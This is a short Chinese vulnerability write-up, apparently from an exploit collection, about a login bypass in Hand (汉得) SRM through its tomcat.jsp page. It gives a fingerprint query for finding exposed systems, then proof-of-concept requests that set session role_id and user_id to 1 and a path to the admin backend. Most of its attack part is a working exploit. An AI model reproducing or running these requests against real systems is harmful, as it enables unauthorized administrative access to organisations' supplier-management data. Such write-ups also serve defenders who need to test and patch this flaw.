# 汉得SRM tomcat.jsp 登陆绕过漏洞

# 漏洞描述

汉得SRM tomcat.jsp 文件存在登陆绕过漏洞, 攻击者通过发送请求包，可以获取后台管理员权限

# 漏洞影响

汉得SRM

# 网络测绘

web.body="汉得SRM"

# 漏洞复现

登陆页面

验证POC (Tomcat session操控)

/tomcat.jsp?dataName=role_id&dataValue=1
/tomcat.jsp?dataName=user_id&dataValue=1

1
2

访问跳转后台

/main.screen

1

金盘微信管理平台 getsysteminfo 未授权访问漏洞亿邮电子邮件系统 moni_detail.do 远程命令执行漏洞